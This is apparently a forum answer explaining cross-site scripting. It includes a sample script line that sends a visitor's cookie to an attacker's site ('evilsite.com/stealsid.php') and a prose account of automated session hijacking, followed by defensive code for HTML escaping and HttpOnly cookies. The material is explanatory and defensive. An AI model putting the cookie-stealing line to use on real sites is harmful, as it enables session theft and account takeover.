Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertently allows client-side scripting to be embedded in one of its pages. This could be something like this:

window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);

When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, removing the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.
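
As an added example (not part of the original post), here are two server-side controls against the cookie theft described above: escaping user-supplied text before it is written into a page, and marking the session cookie HttpOnly so that `document.cookie` does not return it. The function names, the cookie name `SID` and the sample values are constructed for illustration, and `scriptVisibleCookies` is a simplified model of browser behaviour.

```javascript
// Added example, not code from the original post.

// 1. Output encoding: escape user-supplied text before placing it in HTML,
//    so an injected <script> element is displayed as text, not executed.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// 2. Session cookie attributes: HttpOnly keeps the cookie out of
//    document.cookie; Secure and SameSite limit where it is sent.
function sessionCookie(name, sid) {
  return `${name}=${encodeURIComponent(sid)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Simplified model (assumption) of what page scripts can read through
// document.cookie, given the Set-Cookie header values a server sent:
// any cookie carrying the HttpOnly attribute is left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map(header => header.split(';').map(part => part.trim()))
    .filter(([, ...attrs]) => !attrs.some(a => a.toLowerCase() === 'httponly'))
    .map(([nameValue]) => nameValue)
    .join('; ');
}

// Constructed sample data.
const userComment = '<script>injectedCode()</script>';
const weakHeaders = ['SID=abc123; Path=/', 'theme=dark; Path=/'];
const hardenedHeaders = [sessionCookie('SID', 'abc123'), 'theme=dark; Path=/'];

// The escaped comment contains no markup the browser would execute.
console.log(escapeHtml(userComment));
// Without HttpOnly the SID is readable by any script running in the page.
console.log(scriptVisibleCookies(weakHeaders));
// With HttpOnly only the non-sensitive cookie remains readable.
console.log(scriptVisibleCookies(hardenedHeaders));
```

HttpOnly only hides the cookie from scripts; injected code can still act inside the victim's open session, which is why the password prompt before changing vital data remains useful.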